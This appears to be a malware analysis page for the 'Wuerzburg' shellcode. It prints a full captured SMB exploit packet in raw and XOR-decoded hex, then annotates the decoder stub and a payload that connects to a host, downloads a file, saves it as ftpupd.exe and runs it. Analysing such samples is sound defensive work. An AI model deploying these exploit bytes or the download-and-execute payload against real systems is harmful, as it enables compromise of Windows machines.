Wuerzburg Shellcode
Shellcode
raw
/*
00000000 00 00 0c f4 ff 53 4d 42 25 00 00 00 00 18 07 c8 |.....SMB%.......|
00000010 00 00 00 00 00 00 00 00 00 00 00 00 00 08 dc 04 |................|
00000020 00 08 60 00 10 00 00 a0 0c 00 00 00 04 00 00 00 |..`.............|
00000030 00 00 00 00 00 00 00 00 00 54 00 a0 0c 54 00 02 |.........T...T..|
00000040 00 26 00 00 40 b1 0c 10 5c 00 50 00 49 00 50 00 |.&..@...\.P.I.P.|
00000050 45 00 5c 00 00 00 00 00 05 00 00 03 10 00 00 00 |E.\.............|
00000060 a0 0c 00 00 01 00 00 00 88 0c 00 00 00 00 09 00 |................|
00000070 ec 03 00 00 00 00 00 00 ec 03 00 00 90 90 90 90 |................|
00000080 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |................|
*
00000110 90 90 90 90 90 90 90 90 90 90 90 90 eb 27 0b 29 |.............'.)|
00000120 6a 02 ab 85 5d 33 c9 66 b9 25 02 8d 75 05 8b fe |j...]3.f.%..u...|
00000130 8a 06 3c 99 75 05 46 8a 06 2c 30 46 34 99 88 07 |..<.u.F..,0F4...|
00000140 47 e2 ed eb 0a e8 da ff ff ff 2e 62 65 67 2e 71 |G..........beg.q|
00000150 93 99 c9 99 c9 99 c9 12 fd bd 91 fd 16 99 c9 c1 |................|
00000160 72 68 aa 42 fd 66 aa fd 10 ba 14 1c f1 98 99 c9 |rh.B.f..........|
00000170 99 c9 c9 f3 98 f1 98 99 c9 86 99 c9 71 09 98 99 |............q...|
00000180 c9 99 c9 90 5f cb 37 92 59 96 1c bb 98 99 c9 99 |...._.7.Y.......|
00000190 c9 18 75 99 c9 9b 99 c9 99 c9 cd f1 98 98 99 c9 |..u.............|
000001a0 99 c9 71 d2 98 99 c9 99 c9 e4 ec 47 54 18 5d 99 |..q........GT.].|
000001b0 c9 9b 99 c9 99 c9 f3 9f f3 98 f3 9b 71 af 98 99 |............q...|
000001c0 c9 99 c9 f3 68 e3 65 10 1c 1d 98 99 c9 99 c9 1a |....h.e.........|
000001d0 75 d9 ff 5e 9d bd 9b 99 c9 ff 12 dc 4d ff 10 dd |u..^........M...|
000001e0 bd 9b 12 dc 4f ac 33 33 33 33 10 dd bd 9d b2 59 |....O.3333.....Y|
000001f0 14 e5 bd 91 32 32 12 45 f3 89 ca 66 2c 1d 98 99 |....22.E...f,...|
00000200 c9 99 c9 71 6f 99 c9 99 c9 99 c9 13 67 41 74 1a |...qo.......gAt.|
00000210 5d d9 92 59 96 1c 34 99 c9 99 c9 99 c9 f3 9d f1 |]..Y..4.........|
00000220 99 c9 89 99 c9 99 c9 f1 99 c9 99 c9 98 99 c9 f3 |................|
00000230 99 c9 71 65 99 c9 99 c9 99 c9 67 f3 e3 f0 10 1c |..qe......g.....|
00000240 e5 98 99 c9 99 c9 f3 99 c9 f1 99 c9 99 c9 98 99 |................|
00000250 c9 c9 66 2c 1d 98 99 c9 99 c9 71 2e 99 c9 99 c9 |..f,......q.....|
00000260 99 c9 6f e8 c0 97 c9 f3 9b 66 2c 1d 98 99 c9 99 |..o......f,.....|
00000270 c9 71 3c 99 c9 99 c9 99 c9 d8 c1 e5 d5 b2 59 c9 |.q<...........Y.|
00000280 c9 f3 9b c9 c9 f1 99 c9 99 c9 99 c9 d9 14 04 f6 |................|
00000290 98 99 c9 99 c9 ca 71 29 99 c9 99 c9 99 c9 8d 68 |......q).......h|
000002a0 61 91 10 1c f2 98 99 c9 99 c9 c3 1a 61 66 ed a7 |a...........af..|
000002b0 cd 12 5d f3 99 c9 c9 cb 66 2c e5 98 99 c9 99 c9 |..].....f,......|
000002c0 66 2c f2 98 99 c9 99 c9 71 11 99 c9 99 c9 99 c9 |f,......q.......|
000002d0 5a 48 a6 96 c0 66 2c f2 98 99 c9 99 c9 71 e1 99 |ZH...f,......q..|
000002e0 c9 99 c9 99 c9 4c 29 a7 eb f3 9c 14 04 f6 98 99 |.....L).........|
000002f0 c9 99 c9 ca 71 ff 99 c9 99 c9 99 c9 34 f4 26 71 |....q.......4.&q|
00000300 f3 99 c9 71 c2 99 c9 99 c9 99 c9 f9 3b 13 ef ec |...q........;...|
00000310 a0 99 c9 99 c9 99 c9 99 c9 99 c9 b7 c5 ff ed e9 |................|
00000320 ec e9 fd b7 fc e1 fc 99 c9 99 c9 99 c9 99 c9 99 |................|
00000330 c9 99 c9 99 c9 99 c9 99 c9 99 c9 99 c9 99 c9 99 |................|
00000340 c9 ca f5 fc fc e9 99 c9 f2 fc eb f7 fc f5 aa ab |................|
00000350 99 c9 c7 34 f9 aa 59 b4 2d 2a 66 1e c9 ac e6 e7 |...4..Y.-*f.....|
00000360 b7 a5 c9 9c bd b8 9d 82 c9 cd 71 92 99 c9 99 c9 |..........q.....|
00000370 99 c9 bf 19 35 51 14 fd bd 95 0a 72 91 c7 34 f9 |....5Q.....r..4.|
00000380 71 c8 99 c9 99 c9 99 c9 12 d2 a5 12 d5 80 e1 9a |q...............|
00000390 52 aa 6f 14 8d 2a 9a c8 b9 12 8b 9a 4a aa 59 58 |R.o..*......J.YX|
000003a0 59 9e ab 9b db 19 a3 99 c9 ec 6c a2 dd bd 85 ed |Y.........l.....|
000003b0 9e df a2 e8 81 eb 44 55 12 c8 bd 9a 4a 96 2e 8d |......DU....J...|
000003c0 eb 12 d8 85 9a 5a 12 9d 09 9a 5a 10 dd bd 85 f8 |.....Z....Z.....|
000003d0 10 1c 19 98 99 c9 99 c9 66 49 66 7f fd fe 12 87 |........fIf.....|
000003e0 a9 99 c9 12 c2 95 12 c2 85 12 82 12 c2 91 5a b7 |..............Z.|
000003f0 fc f7 fd b7 90 90 90 90 90 90 90 90 90 90 90 90 |................|
00000400 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |................|
*
00000820 90 90 90 90 90 90 90 90 00 46 00 01 90 90 90 90 |.........F......|
00000830 90 90 90 90 90 90 90 90 66 81 ec 1c 07 ff e4 90 |........f.......|
00000840 90 90 90 90 90 90 90 90 90 90 90 90 95 14 40 00 |..............@.|
00000850 03 00 00 00 7c 70 40 00 01 00 00 00 00 00 00 00 |....|p@.........|
00000860 01 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 |................|
*
00000890 01 00 00 00 00 00 00 00 7c 70 40 00 01 00 00 00 |........|p@.....|
000008a0 00 00 00 00 01 00 00 00 00 00 00 00 7c 70 40 00 |............|p@.|
000008b0 01 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 |................|
000008c0 7c 70 40 00 01 00 00 00 00 00 00 00 01 00 00 00 ||p@.............|
000008d0 00 00 00 00 78 85 13 00 ab 5b a6 e9 31 31 31 31 |....x....[..1111|
000008e0 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 |1111111111111111|
*
00000cf0 31 31 31 31 31 31 31 00 |1111111.|
00000cf8
*/
unxor'd
00000000: 00 00 0c f4 ff 53 4d 42 - 25 00 00 00 00 18 07 c8 .....SMB ........
00000010: 00 00 00 00 00 00 00 00 - 00 00 00 00 00 08 dc 04 ........ ........
00000020: 00 08 60 00 10 00 00 a0 - 0c 00 00 00 04 00 00 00 ........ ........
00000030: 00 00 00 00 00 00 00 00 - 00 54 00 a0 0c 54 00 02 ........ .T...T..
00000040: 00 26 00 00 40 b1 0c 10 - 5c 00 50 00 49 00 50 00 ........ ..P.I.P.
00000050: 45 00 5c 00 00 00 00 00 - 05 00 00 03 10 00 00 00 E....... ........
00000060: a0 0c 00 00 01 00 00 00 - 88 0c 00 00 00 00 09 00 ........ ........
00000070: ec 03 00 00 00 00 00 00 - ec 03 00 00 90 90 90 90 ........ ........
00000080: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........
00000090: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........
000000a0: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........
000000b0: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........
000000c0: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........
000000d0: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........
000000e0: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........
000000f0: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........
00000100: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........
00000110: 90 90 90 90 90 90 90 90 - 90 90 90 90 eb 27 0b 29 ........ ........
00000120: 6a 02 ab 85 5d 33 c9 66 - b9 25 02 8d 75 05 8b fe j....3.f ....u...
00000130: 8a 06 3c 99 75 05 46 8a - 06 2c 30 46 34 99 88 07 ....u.F. ..0F4...
00000140: 47 e2 ed eb 0a e8 da ff - ff ff 2e 62 65 67 2e e8 G....... ...beg..
00000150: 0a 00 00 00 8b 64 24 08 - 64 8f 00 58 eb f1 33 db .....d.. d..X..3.
00000160: 64 ff 33 64 89 23 8d 85 - 68 01 00 00 50 6a 01 68 d.3d.... h...Pj.h
00000170: 01 00 1f 00 e8 90 01 00 - 00 09 c6 52 ae 0b c0 0f ........ ...R....
00000180: 85 22 01 00 00 81 ec 00 - 02 00 00 54 68 01 01 00 ........ ...Th...
00000190: 00 e8 4b 01 00 00 7d 75 - de cd 81 c4 00 02 00 00 ..K....u ........
000001a0: 6a 06 6a 01 6a 02 e8 36 - 01 00 00 6a f1 7a fc 89 j.j.j..6 ...j.z..
000001b0: 85 84 01 00 00 83 ec 40 - 66 c7 04 24 02 00 66 8b ........ f.....f.
000001c0: 45 d4 66 89 44 24 02 8b - 45 d6 35 aa aa aa aa 89 E.f.D... E.5.....
000001d0: 44 24 04 2b c0 8d 7c 24 - 08 ab ab 8b dc 6a 10 53 D....... .....j.S
000001e0: ff b5 84 01 00 00 e8 f6 - 00 00 00 8a fe d8 ed 83 ........ ........
000001f0: c4 40 0b c0 0f 85 ad 00 - 00 00 6a 04 68 00 10 00 ........ ..j.h...
00000200: 00 68 00 00 01 00 6a 00 - e8 fc 00 00 00 fe 6a 7a .h....j. ......jz
00000210: 69 89 85 7c 01 00 00 6a - 00 68 00 00 01 00 50 ff i......j .h....P.
00000220: b5 84 01 00 00 e8 b7 00 - 00 00 f6 71 59 0e 50 6a ........ ...qY.Pj
00000230: 02 ff b5 84 01 00 00 e8 - a5 00 00 00 41 58 7c 4c ........ ....AX.L
00000240: 2b c0 50 50 6a 02 50 50 - 68 00 00 00 40 8d 9d 6f ..PPj.PP h......o
00000250: 01 00 00 53 e8 b0 00 00 - 00 14 f1 f8 08 89 85 6b ...S.... .......k
00000260: 01 00 00 5a 83 f8 ff 74 - 3e 54 8b c4 6a 00 50 52 ...Z...t .T..j.PR
00000270: ff b5 7c 01 00 00 ff b5 - 6b 01 00 00 e8 88 00 00 ........ k.......
00000280: 00 c3 d1 3f 0f 59 ff b5 - 6b 01 00 00 e8 78 00 00 .....Y.. k....x..
00000290: 00 d5 b0 3e 72 6a 05 8d - 9d 6f 01 00 00 53 e8 66 ....rj.. .o...S.f
000002a0: 00 00 00 ad 6d bf e8 6a - 00 e8 5b 00 00 00 60 a2 ....m..j ........
000002b0: 8a 76 75 39 00 00 00 00 - 00 2e 5c 66 74 70 75 70 .vu9.... ...ftpup
000002c0: 64 2e 65 78 65 00 00 00 - 00 00 00 00 00 00 00 00 d.exe... ........
000002d0: 00 00 53 6c 65 65 70 00 - 6b 65 72 6e 65 6c 33 32 ..Sleep. kernel32
000002e0: 00 5e ad 60 33 c0 2d b4 - b3 ff 87 50 35 7f 7e 2e ....3... ...P5...
000002f0: 3c 50 05 24 21 04 1b 50 - 54 e8 0b 00 00 00 26 80 .P.....P T.......
00000300: ac c8 8d 64 24 0c 93 eb - 08 5e ad 60 e8 51 00 00 ...d.... .....Q..
00000310: 00 8b 4b 3c 8b 4c 19 78 - 03 cb 33 f6 8d 14 b3 03 ..K..L.x ..3.....
00000320: 51 20 8b 12 03 d3 33 c0 - c1 c0 07 32 02 42 80 3a Q.....3. ...2.B..
00000330: 00 75 f5 3b 44 24 1c 74 - 07 46 3b 71 18 72 dd cc .u..D..t .F.q.r..
00000340: 8b 51 24 03 d3 0f b7 14 - 72 8b 41 1c 03 c3 8b 04 .Q...... r.A.....
00000350: 90 03 c3 89 44 24 1c 61 - 89 85 80 01 00 00 ff d0 ....D..a ........
00000360: ff e6 64 67 8b 1e 30 00 - 8b 5b 0c 8b 5b 1c 8b 1b ..dg..0. ........
00000370: 8b 5b 08 c3 35 51 14 fd - bd 95 0a 72 91 c7 34 f9 ....5Q.. ...r..4.
00000380: 71 c8 99 c9 99 c9 99 c9 - 12 d2 a5 12 d5 80 e1 9a q....... ........
00000390: 52 aa 6f 14 8d 2a 9a c8 - b9 12 8b 9a 4a aa 59 58 R.o..... ....J.YX
000003a0: 59 9e ab 9b db 19 a3 99 - c9 ec 6c a2 dd bd 85 ed Y....... ..l.....
000003b0: 9e df a2 e8 81 eb 44 55 - 12 c8 bd 9a 4a 96 2e 8d ......DU ....J...
000003c0: eb 12 d8 85 9a 5a 12 9d - 09 9a 5a 10 dd bd 85 f8 .....Z.. ..Z.....
000003d0: 10 1c 19 98 99 c9 99 c9 - 66 49 66 7f fd fe 12 87 ........ fIf.....
000003e0: a9 99 c9 12 c2 95 12 c2 - 85 12 82 12 c2 91 5a b7 ........ ......Z.
000003f0: fc f7 fd b7 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........
00000400: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........
00000410: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........
00000420: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........
00000430: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........
00000440: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........
00000450: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........
00000460: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........
00000470: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........
00000480: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........
00000490: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........
000004a0: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........
000004b0: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........
000004c0: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........
000004d0: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........
000004e0: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........
000004f0: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........
00000500: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........
00000510: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........
00000520: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........
00000530: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........
00000540: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........
00000550: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........
00000560: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........
00000570: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........
00000580: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........
00000590: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........
000005a0: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........
000005b0: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........
000005c0: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........
000005d0: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........
000005e0: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........
000005f0: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........
00000600: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........
00000610: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........
00000620: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........
00000630: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........
00000640: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........
00000650: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........
00000660: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........
00000670: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........
00000680: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........
00000690: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........
000006a0: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........
000006b0: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........
000006c0: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........
000006d0: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........
000006e0: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........
000006f0: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........
00000700: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........
00000710: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........
00000720: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........
00000730: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........
00000740: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........
00000750: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........
00000760: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........
00000770: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........
00000780: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........
00000790: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........
000007a0: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........
000007b0: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........
000007c0: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........
000007d0: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........
000007e0: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........
000007f0: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........
00000800: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........
00000810: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........
00000820: 90 90 90 90 90 90 90 90 - 00 46 00 01 90 90 90 90 ........ .F......
00000830: 90 90 90 90 90 90 90 90 - 66 81 ec 1c 07 ff e4 90 ........ f.......
00000840: 90 90 90 90 90 90 90 90 - 90 90 90 90 95 14 40 00 ........ ........
00000850: 03 00 00 00 7c 70 40 00 - 01 00 00 00 00 00 00 00 .....p.. ........
00000860: 01 00 00 00 00 00 00 00 - 01 00 00 00 00 00 00 00 ........ ........
00000870: 01 00 00 00 00 00 00 00 - 01 00 00 00 00 00 00 00 ........ ........
00000880: 01 00 00 00 00 00 00 00 - 01 00 00 00 00 00 00 00 ........ ........
00000890: 01 00 00 00 00 00 00 00 - 7c 70 40 00 01 00 00 00 ........ .p......
000008a0: 00 00 00 00 01 00 00 00 - 00 00 00 00 7c 70 40 00 ........ .....p..
000008b0: 01 00 00 00 00 00 00 00 - 01 00 00 00 00 00 00 00 ........ ........
000008c0: 7c 70 40 00 01 00 00 00 - 00 00 00 00 01 00 00 00 .p...... ........
000008d0: 00 00 00 00 78 85 13 00 - ab 5b a6 e9 31 31 31 31 ....x... ....1111
000008e0: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111
000008f0: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111
00000900: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111
00000910: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111
00000920: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111
00000930: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111
00000940: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111
00000950: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111
00000960: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111
00000970: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111
00000980: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111
00000990: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111
000009a0: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111
000009b0: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111
000009c0: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111
000009d0: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111
000009e0: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111
000009f0: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111
00000a00: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111
00000a10: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111
00000a20: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111
00000a30: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111
00000a40: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111
00000a50: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111
00000a60: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111
00000a70: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111
00000a80: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111
00000a90: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111
00000aa0: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111
00000ab0: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111
00000ac0: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111
00000ad0: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111
00000ae0: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111
00000af0: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111
00000b00: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111
00000b10: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111
00000b20: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111
00000b30: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111
00000b40: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111
00000b50: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111
00000b60: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111
00000b70: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111
00000b80: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111
00000b90: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111
00000ba0: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111
00000bb0: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111
00000bc0: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111
00000bd0: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111
00000be0: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111
00000bf0: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111
00000c00: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111
00000c10: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111
00000c20: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111
00000c30: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111
00000c40: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111
00000c50: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111
00000c60: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111
00000c70: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111
00000c80: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111
00000c90: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111
00000ca0: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111
00000cb0: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111
00000cc0: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111
00000cd0: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111
00000ce0: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111
00000cf0: 31 31 31 31 31 31 31 00 - 00 1111111. .
Analysis
XOR decoder "wuerzburg xor"
0000011C ; ---------------------------------------------------------------------------
0000011C ; XOR decoder stub. The jmp skips the two data words at 11Eh/120h (port and
0000011C ; XOR'd IP, see "unxor'd shellcode" below) and the decoder body itself; the
0000011C ; decoded payload later reads those words as [ebp-2Ch] / [ebp-2Ah].
0000011C ; This fixed stub (EB 27 .. 5D 33 C9 66 B9 .. 8D 75 05 ...) is what the regex
0000011C ; under "shellcode patterns" keys on.
0000011C jmp short loc_145
0000011C ; ---------------------------------------------------------------------------
00000124 ; ---------------------------------------------------------------------------
00000124
00000124 loc_124:
00000124 pop ebp ; ebp = return address of the call at loc_145 = 14Ah; every [ebp+...] in the payload is relative to it
00000125 xor ecx, ecx
00000127 mov cx, 225h ; 225h = 549 OUTPUT bytes: 14Fh..373h, i.e. up to and including the retn of GetKernel32Base
0000012B lea esi, [ebp+5] ; source = 14Fh, skipping the 5-byte ".beg." marker at 14Ah
0000012E mov edi, esi ; destination = same address: decodes in place (esi never falls behind edi, so this is safe)
00000130
00000130 loc_130:
00000130 mov al, [esi]
00000132 cmp al, 99h ; 'Ö' -- escape marker; same value as the XOR key
00000134 jnz short loc_13B
00000136 inc esi ; escaped byte: value = (next byte - 30h) ^ 99h, e.g. raw "99 c9" decodes to 00
00000137 mov al, [esi]
00000139 sub al, 30h ; '0'
0000013B
0000013B loc_13B:
0000013B inc esi
0000013C xor al, 99h ; single-byte XOR key
0000013E mov [edi], al
00000140 inc edi
00000141 loop loc_130 ; ecx counts output bytes; the encoded input is longer because of the escapes
00000143 jmp short loc_14F ; enter the freshly decoded code
00000145 ; ---------------------------------------------------------------------------
00000145
00000145 loc_145:
00000145 call loc_124 ; call/pop trick: pushes 14Ah so loc_124 learns its own address
00000145 ; ---------------------------------------------------------------------------
0000014A db 2Eh ; .   ".beg." -- 5-byte marker between the call and the encoded stream
0000014B db 62h ; b
0000014C db 65h ; e
0000014D db 67h ; g
0000014E db 2Eh ; .
unxor'd shellcode
0000011E dw 290Bh ; bytes 0B 29: sin_port already in network byte order -> TCP port 0B29h (2857); read as [ebp-2Ch]
00000120 dd 85AB026Ah ; IP XOR AAAAAAAAh -- 85AB026Ah ^ AAAAAAAAh = 2F01A8C0h = 192.168.1.47 (RFC1918 address); read as [ebp-2Ah]
0000014F ; ---------------------------------------------------------------------------
0000014F ; Decoded payload (runs after the XOR decoder above). Behaviour, in order:
0000014F ;   install an SEH frame -> OpenMutexA("u9") as an "already running" check -> WSAStartup ->
0000014F ;   socket/connect to the IP:port stored at 120h/11Eh -> VirtualAlloc 64 KiB -> one recv ->
0000014F ;   shutdown -> CreateFileA(".\ftpupd.exe") -> WriteFile -> CloseHandle -> WinExec -> ExitThread.
0000014F ; Indicators visible in the bytes: mutex name "u9", dropped file ".\ftpupd.exe", a bare TCP
0000014F ;   fetch (connect then recv, nothing is sent), and the API-name hash constant after each call.
